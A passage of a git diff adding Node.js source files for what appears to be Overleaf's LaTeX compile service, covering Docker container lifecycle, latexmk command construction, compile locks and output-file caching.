+      options.HostConfig.ReadonlyRootfs = true
+      options.HostConfig.Tmpfs = { '/tmp': 'rw,noexec,nosuid,size=65536k' }
+      options.Volumes['/home/tex'] = {}
+    }
+
+    // Allow per-compile group overriding of individual settings
+    if (
+      Settings.clsi.docker.compileGroupConfig &&
+      Settings.clsi.docker.compileGroupConfig[compileGroup]
+    ) {
+      const override = Settings.clsi.docker.compileGroupConfig[compileGroup]
+      for (const key in override) {
+        _.set(options, key, override[key])
+      }
+    }
+
+    return options
+  },
+
+  _fingerprintContainer(containerOptions) {
+    // Yay, Hashing!
+    const json = JSON.stringify(containerOptions)
+    return crypto.createHash('md5').update(json).digest('hex')
+  },
+
+  startContainer(options, volumes, attachStreamHandler, callback) {
+    LockManager.runWithLock(
+      options.name,
+      releaseLock =>
+        DockerRunner._startContainer(
+          options,
+          volumes,
+          attachStreamHandler,
+          releaseLock
+        ),
+      callback
+    )
+  },
+
+  // Check that volumes exist and are directories
+  _startContainer(options, volumes, attachStreamHandler, callback) {
+    callback = _.once(callback)
+    const { name } = options
+
+    logger.debug({ containerName: name }, 'starting container')
+    const container = dockerode.getContainer(name)
+
+    function createAndStartContainer() {
+      dockerode.createContainer(options, (error, container) => {
+        if (error != null) {
+          return callback(error)
+        }
+        startExistingContainer()
+      })
+    }
+
+    function startExistingContainer() {
+      DockerRunner.attachToContainer(
+        options.name,
+        attachStreamHandler,
+        error => {
+          if (error != null) {
+            return callback(error)
+          }
+          container.start(error => {
+            if (error != null && error.statusCode !== 304) {
+              callback(error)
+            } else {
+              // started, or 304: container already running
+              callback()
+            }
+          })
+        }
+      )
+    }
+
+    container.inspect((error, stats) => {
+      if (error != null && error.statusCode === 404) {
+        createAndStartContainer()
+      } else if (error != null) {
+        logger.err(
+          { containerName: name, error },
+          'unable to inspect container to start'
+        )
+        callback(error)
+      } else {
+        startExistingContainer()
+      }
+    })
+  },
+
+  attachToContainer(containerId, attachStreamHandler, attachStartCallback) {
+    const container = dockerode.getContainer(containerId)
+    container.attach({ stdout: 1, stderr: 1, stream: 1 }, (error, stream) => {
+      if (error != null) {
+        logger.error(
+          { err: error, containerId },
'error attaching to container'
+        )
+        return attachStartCallback(error)
+      } else {
+        attachStartCallback()
+      }
+
+      logger.debug({ containerId }, 'attached to container')
+
+      const MAX_OUTPUT = 1024 * 1024 * 2 // limit output to 2MB
+      function createStringOutputStream(name) {
+        return {
+          data: '',
+          overflowed: false,
+          write(data) {
+            if (this.overflowed) {
+              return
+            }
+            if (this.data.length < MAX_OUTPUT) {
+              this.data += data
+            } else {
+              logger.info(
+                {
+                  containerId,
+                  length: this.data.length,
+                  maxLen: MAX_OUTPUT,
+                },
+                `${name} exceeds max size`
+              )
+              this.data += `(...truncated at ${MAX_OUTPUT} chars...)`
+              this.overflowed = true
+            }
+          },
+          // kill container if too much output
+          // docker.containers.kill(containerId, () => {})
+        }
+      }
+
+      const stdout = createStringOutputStream('stdout')
+      const stderr = createStringOutputStream('stderr')
+
+      container.modem.demuxStream(stream, stdout, stderr)
+
+      stream.on('error', err =>
+        logger.error(
+          { err, containerId },
+          'error reading from container stream'
+        )
+      )
+
+      stream.on('end', () =>
+        attachStreamHandler(null, { stdout: stdout.data, stderr: stderr.data })
+      )
+    })
+  },
+
+  waitForContainer(containerId, timeout, _callback) {
+    const callback = _.once(_callback)
+
+    const container = dockerode.getContainer(containerId)
+
+    let timedOut = false
+    const timeoutId = setTimeout(() => {
+      timedOut = true
+      logger.debug({ containerId }, 'timeout reached, killing container')
+      container.kill(err => {
+        if (err != null) {
+          logger.warn({ err, containerId }, 'failed to kill container')
+        }
+      })
+    }, timeout)
+
+    logger.debug({ containerId }, 'waiting for docker container')
+    container.wait((error, res) => {
+      if (error != null) {
+        clearTimeout(timeoutId)
+        logger.warn({ err: error, containerId }, 'error waiting for container')
+        return callback(error)
+      }
+      if (timedOut) {
+        logger.debug({ containerId }, 'docker container timed out')
+        error = new Error('container timed out')
+        error.timedout = true
+        callback(error)
+      } else {
+        clearTimeout(timeoutId)
+        logger.debug(
+          { containerId, exitCode: res.StatusCode },
+          'docker container returned'
+        )
+        callback(null, res.StatusCode)
+      }
+    })
+  },
+
+  destroyContainer(containerName, containerId, shouldForce, callback) {
+    // We want the containerName for the lock and, ideally, the
+    // containerId to delete. There is a bug in the docker.io module
+    // where if you delete by name and there is an error, it throws an
+    // async exception, but if you delete by id it just does a normal
+    // error callback. We fall back to deleting by name if no id is
+    // supplied.
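+    // Illustrative call shapes for the fallback described above (the
+    // container name and callback here are assumptions):
+    //
+    //   destroyContainer('project-<id>-<hash>', containerId, false, cb) // normal: delete by id
+    //   destroyContainer('project-<id>-<hash>', null, true, cb)         // fallback: force-delete by name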
+ LockManager.runWithLock( + containerName, + releaseLock => + DockerRunner._destroyContainer( + containerId || containerName, + shouldForce, + releaseLock + ), + callback + ) + }, + + _destroyContainer(containerId, shouldForce, callback) { + logger.debug({ containerId }, 'destroying docker container') + const container = dockerode.getContainer(containerId) + container.remove({ force: shouldForce === true, v: true }, error => { + if (error != null && error.statusCode === 404) { + logger.warn( + { err: error, containerId }, + 'container not found, continuing' + ) + error = null + } + if (error != null) { + logger.error({ err: error, containerId }, 'error destroying container') + } else { + logger.debug({ containerId }, 'destroyed container') + } + callback(error) + }) + }, + + // handle expiry of docker containers + + MAX_CONTAINER_AGE: Settings.clsi.docker.maxContainerAge || ONE_HOUR_IN_MS, + + examineOldContainer(container, callback) { + const name = container.Name || (container.Names && container.Names[0]) + const created = container.Created * 1000 // creation time is returned in seconds + const now = Date.now() + const age = now - created + const maxAge = DockerRunner.MAX_CONTAINER_AGE + const ttl = maxAge - age + logger.debug( + { containerName: name, created, now, age, maxAge, ttl }, + 'checking whether to destroy container' + ) + return { name, id: container.Id, ttl } + }, + + destroyOldContainers(callback) { + dockerode.listContainers({ all: true }, (error, containers) => { + if (error != null) { + return callback(error) + } + const jobs = [] + for (const container of containers) { + const { name, id, ttl } = DockerRunner.examineOldContainer(container) + if (name.slice(0, 9) === '/project-' && ttl <= 0) { + // strip the / prefix + // the LockManager uses the plain container name + const plainName = name.slice(1) + jobs.push(cb => + DockerRunner.destroyContainer(plainName, id, false, () => cb()) + ) + } + } + // Ignore errors because some containers get stuck but + // will be destroyed next time + async.series(jobs, callback) + }) + }, + + startContainerMonitor() { + logger.debug( + { maxAge: DockerRunner.MAX_CONTAINER_AGE }, + 'starting container expiry' + ) + + // guarantee only one monitor is running + DockerRunner.stopContainerMonitor() + + // randomise the start time + const randomDelay = Math.floor(Math.random() * 5 * 60 * 1000) + containerMonitorTimeout = setTimeout(() => { + containerMonitorInterval = setInterval( + () => + DockerRunner.destroyOldContainers(err => { + if (err) { + logger.error({ err }, 'failed to destroy old containers') + } + }), + ONE_HOUR_IN_MS + ) + }, randomDelay) + }, + + stopContainerMonitor() { + if (containerMonitorTimeout) { + clearTimeout(containerMonitorTimeout) + containerMonitorTimeout = undefined + } + if (containerMonitorInterval) { + clearInterval(containerMonitorInterval) + containerMonitorInterval = undefined + } + }, + + canRunSyncTeXInOutputDir() { + return Boolean(Settings.path.sandboxedCompilesHostDirOutput) + }, +} + +DockerRunner.startContainerMonitor() + +module.exports = DockerRunner +module.exports.promises = { + run: promisify(DockerRunner.run), + kill: promisify(DockerRunner.kill), +} diff --git a/services/clsi/app/js/DraftModeManager.js b/services/clsi/app/js/DraftModeManager.js new file mode 100644 index 0000000..cf8abab --- /dev/null +++ b/services/clsi/app/js/DraftModeManager.js @@ -0,0 +1,24 @@ +const fsPromises = require('node:fs/promises') +const { callbackify } = require('node:util') +const logger = 
require('@overleaf/logger') + +async function injectDraftMode(filename) { + const content = await fsPromises.readFile(filename, { encoding: 'utf8' }) + const modifiedContent = + '\\PassOptionsToPackage{draft}{graphicx}\\PassOptionsToPackage{draft}{graphics}' + + content + logger.debug( + { + content: content.slice(0, 1024), // \documentclass is normally v near the top + modifiedContent: modifiedContent.slice(0, 1024), + filename, + }, + 'injected draft class' + ) + await fsPromises.writeFile(filename, modifiedContent, { encoding: 'utf8' }) +} + +module.exports = { + injectDraftMode: callbackify(injectDraftMode), + promises: { injectDraftMode }, +} diff --git a/services/clsi/app/js/Errors.js b/services/clsi/app/js/Errors.js new file mode 100644 index 0000000..64c3c7b --- /dev/null +++ b/services/clsi/app/js/Errors.js @@ -0,0 +1,49 @@ +/* eslint-disable + no-proto, + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +const OError = require('@overleaf/o-error') + +let Errors +function NotFoundError(message) { + const error = new Error(message) + error.name = 'NotFoundError' + error.__proto__ = NotFoundError.prototype + return error +} +NotFoundError.prototype.__proto__ = Error.prototype + +function FilesOutOfSyncError(message) { + const error = new Error(message) + error.name = 'FilesOutOfSyncError' + error.__proto__ = FilesOutOfSyncError.prototype + return error +} +FilesOutOfSyncError.prototype.__proto__ = Error.prototype + +function AlreadyCompilingError(message) { + const error = new Error(message) + error.name = 'AlreadyCompilingError' + error.__proto__ = AlreadyCompilingError.prototype + return error +} +AlreadyCompilingError.prototype.__proto__ = Error.prototype + +class QueueLimitReachedError extends OError {} +class TimedOutError extends OError {} +class NoXrefTableError extends OError {} +class TooManyCompileRequestsError extends OError {} +class InvalidParameter extends OError {} + +module.exports = Errors = { + QueueLimitReachedError, + TimedOutError, + NotFoundError, + FilesOutOfSyncError, + AlreadyCompilingError, + NoXrefTableError, + TooManyCompileRequestsError, + InvalidParameter, +} diff --git a/services/clsi/app/js/LatexRunner.js b/services/clsi/app/js/LatexRunner.js new file mode 100644 index 0000000..beefa00 --- /dev/null +++ b/services/clsi/app/js/LatexRunner.js @@ -0,0 +1,203 @@ +const Path = require('node:path') +const { promisify } = require('node:util') +const Settings = require('@overleaf/settings') +const logger = require('@overleaf/logger') +const CommandRunner = require('./CommandRunner') +const fs = require('node:fs') + +const ProcessTable = {} // table of currently running jobs (pids or docker container names) + +const TIME_V_METRICS = Object.entries({ + 'cpu-percent': /Percent of CPU this job got: (\d+)/m, + 'cpu-time': /User time.*: (\d+.\d+)/m, + 'sys-time': /System time.*: (\d+.\d+)/m, +}) + +const COMPILER_FLAGS = { + latex: '-pdfdvi', + lualatex: '-lualatex', + pdflatex: '-pdf', + xelatex: '-xelatex', +} + +function runLatex(projectId, options, callback) { + const { + directory, + mainFile, + image, + environment, + flags, + compileGroup, + stopOnFirstError, + stats, + timings, + } = options + const compiler = options.compiler || 'pdflatex' + const timeout = options.timeout || 60000 // milliseconds + + logger.debug( + { + directory, + compiler, + timeout, + mainFile, + environment, + flags, + compileGroup, + stopOnFirstError, + }, + 'starting compile' + ) + + let command + try { + command 
= _buildLatexCommand(mainFile, { + compiler, + stopOnFirstError, + flags, + }) + } catch (err) { + return callback(err) + } + + const id = `${projectId}` // record running project under this id + + ProcessTable[id] = CommandRunner.run( + projectId, + command, + directory, + image, + timeout, + environment, + compileGroup, + function (error, output) { + delete ProcessTable[id] + if (error) { + return callback(error) + } + const runs = + output?.stderr?.match(/^Run number \d+ of .*latex/gm)?.length || 0 + const failed = output?.stdout?.match(/^Latexmk: Errors/m) != null ? 1 : 0 + // counters from latexmk output + stats['latexmk-errors'] = failed + stats['latex-runs'] = runs + stats['latex-runs-with-errors'] = failed ? runs : 0 + stats[`latex-runs-${runs}`] = 1 + stats[`latex-runs-with-errors-${runs}`] = failed ? 1 : 0 + // timing information from /usr/bin/time + const stderr = (output && output.stderr) || '' + if (stderr.includes('Command being timed:')) { + // Add metrics for runs with `$ time -v ...` + for (const [timing, matcher] of TIME_V_METRICS) { + const match = stderr.match(matcher) + if (match) { + timings[timing] = parseFloat(match[1]) + } + } + } + // record output files + _writeLogOutput(projectId, directory, output, () => { + callback(error, output) + }) + } + ) +} + +function _writeLogOutput(projectId, directory, output, callback) { + if (!output) { + return callback() + } + // internal method for writing non-empty log files + function _writeFile(file, content, cb) { + if (content && content.length > 0) { + fs.unlink(file, () => { + fs.writeFile(file, content, { flag: 'wx' }, err => { + if (err) { + // don't fail on error + logger.error({ err, projectId, file }, 'error writing log file') + } + cb() + }) + }) + } else { + cb() + } + } + // write stdout and stderr, ignoring errors + _writeFile(Path.join(directory, 'output.stdout'), output.stdout, () => { + _writeFile(Path.join(directory, 'output.stderr'), output.stderr, () => { + callback() + }) + }) +} + +function killLatex(projectId, callback) { + const id = `${projectId}` + logger.debug({ id }, 'killing running compile') + if (ProcessTable[id] == null) { + logger.warn({ id }, 'no such project to kill') + callback(null) + } else { + CommandRunner.kill(ProcessTable[id], callback) + } +} + +function _buildLatexCommand(mainFile, opts = {}) { + const command = [] + + if (Settings.clsi?.strace) { + command.push('strace', '-o', 'strace', '-ff') + } + + if (Settings.clsi?.latexmkCommandPrefix) { + command.push(...Settings.clsi.latexmkCommandPrefix) + } + + // Basic command and flags + command.push( + 'latexmk', + '-cd', + '-jobname=output', + '-auxdir=$COMPILE_DIR', + '-outdir=$COMPILE_DIR', + '-synctex=1', + '-interaction=batchmode' + ) + + // Stop on first error option + if (opts.stopOnFirstError) { + command.push('-halt-on-error') + } else { + // Run all passes despite errors + command.push('-f') + } + + // Extra flags + if (opts.flags) { + command.push(...opts.flags) + } + + // TeX Engine selection + const compilerFlag = COMPILER_FLAGS[opts.compiler] + if (compilerFlag) { + command.push(compilerFlag) + } else { + throw new Error(`unknown compiler: ${opts.compiler}`) + } + + // We want to run latexmk on the tex file which we will automatically + // generate from the Rtex/Rmd/md file. 
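+  // Sketch of the rewrite below (illustrative file names):
+  //   'paper.Rmd'  -> 'paper.tex'
+  //   'thesis.Rnw' -> 'thesis.tex'
+  //   'main.tex'   -> 'main.tex' (no matching suffix, left unchanged)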
+ mainFile = mainFile.replace(/\.(Rtex|md|Rmd|Rnw)$/, '.tex') + command.push(Path.join('$COMPILE_DIR', mainFile)) + + return command +} + +module.exports = { + runLatex, + killLatex, + promises: { + runLatex: promisify(runLatex), + killLatex: promisify(killLatex), + }, +} diff --git a/services/clsi/app/js/LocalCommandRunner.js b/services/clsi/app/js/LocalCommandRunner.js new file mode 100644 index 0000000..ce27473 --- /dev/null +++ b/services/clsi/app/js/LocalCommandRunner.js @@ -0,0 +1,111 @@ +/* eslint-disable + no-return-assign, + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS101: Remove unnecessary use of Array.from + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +let CommandRunner +const { spawn } = require('node:child_process') +const { promisify } = require('node:util') +const _ = require('lodash') +const logger = require('@overleaf/logger') + +logger.debug('using standard command runner') + +module.exports = CommandRunner = { + run( + projectId, + command, + directory, + image, + timeout, + environment, + compileGroup, + callback + ) { + let key, value + callback = _.once(callback) + command = Array.from(command).map(arg => + arg.toString().replace('$COMPILE_DIR', directory) + ) + logger.debug({ projectId, command, directory }, 'running command') + logger.warn('timeouts and sandboxing are not enabled with CommandRunner') + + // merge environment settings + const env = {} + for (key in process.env) { + value = process.env[key] + env[key] = value + } + for (key in environment) { + value = environment[key] + env[key] = value + } + + // run command as detached process so it has its own process group (which can be killed if needed) + const proc = spawn(command[0], command.slice(1), { + cwd: directory, + env, + stdio: ['pipe', 'pipe', 'ignore'], + }) + + let stdout = '' + proc.stdout.setEncoding('utf8').on('data', data => (stdout += data)) + + proc.on('error', function (err) { + logger.err( + { err, projectId, command, directory }, + 'error running command' + ) + return callback(err) + }) + + proc.on('close', function (code, signal) { + let err + logger.debug({ code, signal, projectId }, 'command exited') + if (signal === 'SIGTERM') { + // signal from kill method below + err = new Error('terminated') + err.terminated = true + return callback(err) + } else if (code === 1) { + // exit status from chktex + err = new Error('exited') + err.code = code + return callback(err) + } else { + return callback(null, { stdout }) + } + }) + + return proc.pid + }, // return process id to allow job to be killed if necessary + + kill(pid, callback) { + if (callback == null) { + callback = function () {} + } + try { + process.kill(-pid) // kill all processes in group + } catch (err) { + return callback(err) + } + return callback() + }, + + canRunSyncTeXInOutputDir() { + return true + }, +} + +module.exports.promises = { + run: promisify(CommandRunner.run), + kill: promisify(CommandRunner.kill), +} diff --git a/services/clsi/app/js/LockManager.js b/services/clsi/app/js/LockManager.js new file mode 100644 index 0000000..a44810f --- /dev/null +++ b/services/clsi/app/js/LockManager.js @@ -0,0 +1,66 @@ +const logger = require('@overleaf/logger') +const Errors = require('./Errors') +const RequestParser = require('./RequestParser') 
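+// Usage sketch (illustrative; the lock key and compile function are
+// assumptions, the real callers live elsewhere in this service):
+//
+//   const lock = LockManager.acquire(lockKey) // may throw AlreadyCompilingError
+//                                             // or TooManyCompileRequestsError
+//   try {
+//     await runCompile()
+//   } finally {
+//     lock.release()
+//   }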
+const Metrics = require('@overleaf/metrics') +const Settings = require('@overleaf/settings') + +// The lock timeout should be higher than the maximum end-to-end compile time. +// Here, we use the maximum compile timeout plus 2 minutes. +const LOCK_TIMEOUT_MS = RequestParser.MAX_TIMEOUT * 1000 + 120000 + +const LOCKS = new Map() + +function acquire(key) { + const currentLock = LOCKS.get(key) + if (currentLock != null) { + if (currentLock.isExpired()) { + logger.warn({ key }, 'Compile lock expired') + currentLock.release() + } else { + throw new Errors.AlreadyCompilingError('compile in progress') + } + } + + checkConcurrencyLimit() + + const lock = new Lock(key) + LOCKS.set(key, lock) + return lock +} + +function checkConcurrencyLimit() { + Metrics.gauge('concurrent_compile_requests', LOCKS.size) + + if (LOCKS.size <= Settings.compileConcurrencyLimit) { + return + } + + Metrics.inc('exceeded-compilier-concurrency-limit') + + throw new Errors.TooManyCompileRequestsError( + 'too many concurrent compile requests' + ) +} + +class Lock { + constructor(key) { + this.key = key + this.expiresAt = Date.now() + LOCK_TIMEOUT_MS + } + + isExpired() { + return Date.now() >= this.expiresAt + } + + release() { + const lockWasActive = LOCKS.delete(this.key) + if (!lockWasActive) { + logger.error({ key: this.key }, 'Lock was released twice') + } + if (this.isExpired()) { + Metrics.inc('compile_lock_expired_before_release') + } + } +} + +module.exports = { acquire } diff --git a/services/clsi/app/js/Metrics.js b/services/clsi/app/js/Metrics.js new file mode 100644 index 0000000..f0e5779 --- /dev/null +++ b/services/clsi/app/js/Metrics.js @@ -0,0 +1,3 @@ +// TODO: This file was created by bulk-decaffeinate. +// Sanity-check the conversion and remove this comment. +module.exports = require('@overleaf/metrics') diff --git a/services/clsi/app/js/OutputCacheManager.js b/services/clsi/app/js/OutputCacheManager.js new file mode 100644 index 0000000..a1a0a89 --- /dev/null +++ b/services/clsi/app/js/OutputCacheManager.js @@ -0,0 +1,688 @@ +let OutputCacheManager +const { callbackify, promisify } = require('node:util') +const async = require('async') +const fs = require('node:fs') +const Path = require('node:path') +const logger = require('@overleaf/logger') +const _ = require('lodash') +const Settings = require('@overleaf/settings') +const crypto = require('node:crypto') +const Metrics = require('./Metrics') + +const OutputFileOptimiser = require('./OutputFileOptimiser') +const ContentCacheManager = require('./ContentCacheManager') +const { + QueueLimitReachedError, + TimedOutError, + NoXrefTableError, +} = require('./Errors') + +const OLDEST_BUILD_DIR = new Map() +const PENDING_PROJECT_ACTIONS = new Map() + +function init() { + doInit().catch(err => { + logger.fatal({ err }, 'low level error setting up cleanup of output dir') + // consider shutting down? 
+ }) +} + +async function doInit() { + await fillCache() + const oldestTimestamp = await runBulkCleanup() + scheduleBulkCleanup(oldestTimestamp) +} + +function scheduleBulkCleanup(oldestTimestamp) { + const delay = + Math.max(OutputCacheManager.CACHE_AGE + oldestTimestamp - Date.now(), 0) + + 60 * 1000 + setTimeout(async function () { + const oldestTimestamp = await runBulkCleanup() + scheduleBulkCleanup(oldestTimestamp) + }, delay) +} + +async function fillCache() { + const handle = await fs.promises.opendir(Settings.path.outputDir) + try { + for await (const { name: projectIdAndUserId } of handle) { + OLDEST_BUILD_DIR.set( + Path.join(Settings.path.outputDir, projectIdAndUserId), + // Queue them for cleanup in the next hour. + Date.now() - Math.random() * OutputCacheManager.CACHE_AGE + ) + } + } finally { + try { + await handle.close() + } catch (e) {} + } +} + +async function runBulkCleanup() { + const cleanupThreshold = Date.now() - OutputCacheManager.CACHE_AGE + let oldestTimestamp = Date.now() + for (const [dir, timeStamp] of OLDEST_BUILD_DIR.entries()) { + if (timeStamp < cleanupThreshold) { + await cleanupDirectory(dir, { limit: OutputCacheManager.CACHE_LIMIT }) + } else if (timeStamp < oldestTimestamp) { + oldestTimestamp = timeStamp + } + } + return oldestTimestamp +} + +async function cleanupDirectory(dir, options) { + return await queueDirOperation(dir, async () => { + try { + await OutputCacheManager.promises.expireOutputFiles(dir, options) + } catch (err) { + logger.err({ dir, err }, 'cleanup of output directory failed') + } + }) +} + +/** + * @template T + * + * @param {string} dir + * @param {() => Promise} fn + * @return {Promise} + */ +async function queueDirOperation(dir, fn) { + const pending = PENDING_PROJECT_ACTIONS.get(dir) || Promise.resolve() + const p = pending.then(fn, fn).finally(() => { + if (PENDING_PROJECT_ACTIONS.get(dir) === p) { + PENDING_PROJECT_ACTIONS.delete(dir) + } + }) + PENDING_PROJECT_ACTIONS.set(dir, p) + return p +} + +module.exports = OutputCacheManager = { + CONTENT_SUBDIR: 'content', + CACHE_SUBDIR: 'generated-files', + ARCHIVE_SUBDIR: 'archived-logs', + // build id is HEXDATE-HEXRANDOM from Date.now() and RandomBytes + BUILD_REGEX: /^[0-9a-f]+-[0-9a-f]+$/, + CONTENT_REGEX: /^[0-9a-f]+-[0-9a-f]+$/, + CACHE_LIMIT: 2, // maximum number of cache directories + CACHE_AGE: 90 * 60 * 1000, // up to 90 minutes old + + init, + queueDirOperation: callbackify(queueDirOperation), + + path(buildId, file) { + // used by static server, given build id return '.cache/clsi/buildId' + if (buildId.match(OutputCacheManager.BUILD_REGEX)) { + return Path.join(OutputCacheManager.CACHE_SUBDIR, buildId, file) + } else { + // for invalid build id, return top level + return file + } + }, + + generateBuildId(callback) { + // generate a secure build id from Date.now() and 8 random bytes in hex + crypto.randomBytes(8, function (err, buf) { + if (err) { + return callback(err) + } + const random = buf.toString('hex') + const date = Date.now().toString(16) + callback(err, `${date}-${random}`) + }) + }, + + saveOutputFiles( + { request, stats, timings }, + outputFiles, + compileDir, + outputDir, + callback + ) { + const getBuildId = cb => { + if (request.buildId) return cb(null, request.buildId) + OutputCacheManager.generateBuildId(cb) + } + getBuildId(function (err, buildId) { + if (err) { + return callback(err) + } + if (!OLDEST_BUILD_DIR.has(outputDir)) { + // Register for cleanup + OLDEST_BUILD_DIR.set(outputDir, Date.now()) + } + + OutputCacheManager.queueDirOperation( + 
outputDir, + () => + OutputCacheManager.promises.saveOutputFilesInBuildDir( + outputFiles, + compileDir, + outputDir, + buildId + ), + function (err, result) { + if (err) { + return callback(err) + } + OutputCacheManager.collectOutputPdfSize( + result, + outputDir, + stats, + (err, outputFiles) => { + if (err) return callback(err, { outputFiles, buildId }) + + const enablePdfCaching = request.enablePdfCaching + const enablePdfCachingDark = + Settings.enablePdfCachingDark && !request.enablePdfCaching + if ( + !Settings.enablePdfCaching || + (!enablePdfCaching && !enablePdfCachingDark) + ) { + return callback(null, { outputFiles, buildId }) + } + + OutputCacheManager.saveStreamsInContentDir( + { request, stats, timings, enablePdfCachingDark }, + outputFiles, + compileDir, + outputDir, + (err, status) => { + Metrics.inc('pdf-caching-status', 1, { + status, + ...request.metricsOpts, + }) + if (err) { + logger.warn( + { err, outputDir, stats, timings }, + 'pdf caching failed' + ) + return callback(null, { outputFiles, buildId }) + } + callback(err, { outputFiles, buildId }) + } + ) + } + ) + } + ) + }) + }, + + saveOutputFilesInBuildDir( + outputFiles, + compileDir, + outputDir, + buildId, + callback + ) { + // make a compileDir/CACHE_SUBDIR/build_id directory and + // copy all the output files into it + // Put the files into a new cache subdirectory + const cacheDir = Path.join( + outputDir, + OutputCacheManager.CACHE_SUBDIR, + buildId + ) + // Is it a per-user compile? check if compile directory is PROJECTID-USERID + const perUser = Path.basename(compileDir).match( + /^[0-9a-f]{24}-[0-9a-f]{24}$/ + ) + + // Archive logs in background + if (Settings.clsi?.archive_logs || Settings.clsi?.strace) { + OutputCacheManager.archiveLogs( + outputFiles, + compileDir, + outputDir, + buildId, + function (err) { + if (err) { + return logger.warn({ err }, 'erroring archiving log files') + } + } + ) + } + + // make the new cache directory + fs.mkdir(cacheDir, { recursive: true }, function (err) { + if (err) { + logger.error( + { err, directory: cacheDir }, + 'error creating cache directory' + ) + callback(err) + } else { + // copy all the output files into the new cache directory + const results = [] + const dirCache = new Set() + dirCache.add(cacheDir) + async.mapSeries( + outputFiles, + function (file, cb) { + // don't send dot files as output, express doesn't serve them + if (OutputCacheManager._fileIsHidden(file.path)) { + logger.debug( + { compileDir, path: file.path }, + 'ignoring dotfile in output' + ) + return cb() + } + // copy other files into cache directory if valid + const src = Path.join(compileDir, file.path) + const dst = Path.join(cacheDir, file.path) + OutputCacheManager._checkIfShouldCopy( + src, + function (err, shouldCopy) { + if (err) { + return cb(err) + } + if (!shouldCopy) { + return cb() + } + OutputCacheManager._copyFile(src, dst, dirCache, err => { + if (err) { + return cb(err) + } + file.build = buildId + results.push(file) + cb() + }) + } + ) + }, + function (err) { + if (err) { + callback(err) + // clean up the directory we just created + fs.rm(cacheDir, { force: true, recursive: true }, function (err) { + if (err) { + return logger.error( + { err, dir: cacheDir }, + 'error removing cache dir after failure' + ) + } + }) + } else { + // pass back the list of new files in the cache + callback(null, results) + // let file expiry run in the background, expire all previous files if per-user + cleanupDirectory(outputDir, { + keep: buildId, + limit: perUser ? 
1 : null, + }).catch(() => {}) + } + } + ) + } + }) + }, + + collectOutputPdfSize(outputFiles, outputDir, stats, callback) { + const outputFile = outputFiles.find(x => x.path === 'output.pdf') + if (!outputFile) return callback(null, outputFiles) + const outputFilePath = Path.join( + outputDir, + OutputCacheManager.path(outputFile.build, outputFile.path) + ) + fs.stat(outputFilePath, (err, stat) => { + if (err) return callback(err, outputFiles) + + outputFile.size = stat.size + stats['pdf-size'] = outputFile.size + callback(null, outputFiles) + }) + }, + + saveStreamsInContentDir( + { request, stats, timings, enablePdfCachingDark }, + outputFiles, + compileDir, + outputDir, + callback + ) { + const cacheRoot = Path.join(outputDir, OutputCacheManager.CONTENT_SUBDIR) + // check if content dir exists + OutputCacheManager.ensureContentDir(cacheRoot, function (err, contentDir) { + if (err) return callback(err, 'content-dir-unavailable') + + const outputFile = outputFiles.find(x => x.path === 'output.pdf') + if (outputFile) { + // possibly we should copy the file from the build dir here + const outputFilePath = Path.join( + outputDir, + OutputCacheManager.path(outputFile.build, outputFile.path) + ) + const pdfSize = outputFile.size + const timer = new Metrics.Timer( + 'compute-pdf-ranges', + 1, + request.metricsOpts + ) + ContentCacheManager.update( + { + contentDir, + filePath: outputFilePath, + pdfSize, + pdfCachingMinChunkSize: request.pdfCachingMinChunkSize, + compileTime: timings.compile, + }, + function (err, result) { + if (err && err instanceof NoXrefTableError) { + return callback(null, err.message) + } + if (err && err instanceof QueueLimitReachedError) { + logger.warn({ err, outputDir }, 'pdf caching queue limit reached') + stats['pdf-caching-queue-limit-reached'] = 1 + return callback(null, 'queue-limit') + } + if (err && err instanceof TimedOutError) { + logger.warn( + { err, outputDir, stats, timings }, + 'pdf caching timed out' + ) + stats['pdf-caching-timed-out'] = 1 + return callback(null, 'timed-out') + } + if (err) return callback(err, 'failed') + const { + contentRanges, + newContentRanges, + reclaimedSpace, + overheadDeleteStaleHashes, + timedOutErr, + startXRefTable, + } = result + + let status = 'success' + if (timedOutErr) { + // Soft failure: let the frontend use partial set of ranges. + logger.warn( + { + err: timedOutErr, + overheadDeleteStaleHashes, + outputDir, + stats, + timings, + }, + 'pdf caching timed out - soft failure' + ) + stats['pdf-caching-timed-out'] = 1 + status = 'timed-out-soft-failure' + } + + if (enablePdfCachingDark) { + // In dark mode we are doing the computation only and do not emit + // any ranges to the frontend. 
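+              // Illustrative shape of the fields set in the else branch
+              // below (values, and any range fields beyond start/end, are
+              // assumptions rather than a documented schema):
+              //   outputFile.contentId = '18c3a9f2d10-9f2e4b7c1a3d5e60'
+              //   outputFile.ranges = [{ start: 0, end: 4096, ... }]
+              //   outputFile.startXRefTable = 123456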
+ } else { + outputFile.contentId = Path.basename(contentDir) + outputFile.ranges = contentRanges + outputFile.startXRefTable = startXRefTable + } + + timings['compute-pdf-caching'] = timer.done() + stats['pdf-caching-n-ranges'] = contentRanges.length + stats['pdf-caching-total-ranges-size'] = contentRanges.reduce( + (sum, next) => sum + (next.end - next.start), + 0 + ) + stats['pdf-caching-n-new-ranges'] = newContentRanges.length + stats['pdf-caching-new-ranges-size'] = newContentRanges.reduce( + (sum, next) => sum + (next.end - next.start), + 0 + ) + stats['pdf-caching-reclaimed-space'] = reclaimedSpace + timings['pdf-caching-overhead-delete-stale-hashes'] = + overheadDeleteStaleHashes + callback(null, status) + } + ) + } else { + callback(null, 'missing-pdf') + } + }) + }, + + ensureContentDir(contentRoot, callback) { + fs.mkdir(contentRoot, { recursive: true }, function (err) { + if (err) { + return callback(err) + } + fs.readdir(contentRoot, function (err, results) { + if (err) return callback(err) + const dirs = results.sort() + const contentId = dirs.find(dir => + OutputCacheManager.BUILD_REGEX.test(dir) + ) + if (contentId) { + callback(null, Path.join(contentRoot, contentId)) + } else { + // make a content directory + OutputCacheManager.generateBuildId(function (err, contentId) { + if (err) { + return callback(err) + } + const contentDir = Path.join(contentRoot, contentId) + fs.mkdir(contentDir, { recursive: true }, function (err) { + if (err) { + return callback(err) + } + callback(null, contentDir) + }) + }) + } + }) + }) + }, + + archiveLogs(outputFiles, compileDir, outputDir, buildId, callback) { + const archiveDir = Path.join( + outputDir, + OutputCacheManager.ARCHIVE_SUBDIR, + buildId + ) + logger.debug({ dir: archiveDir }, 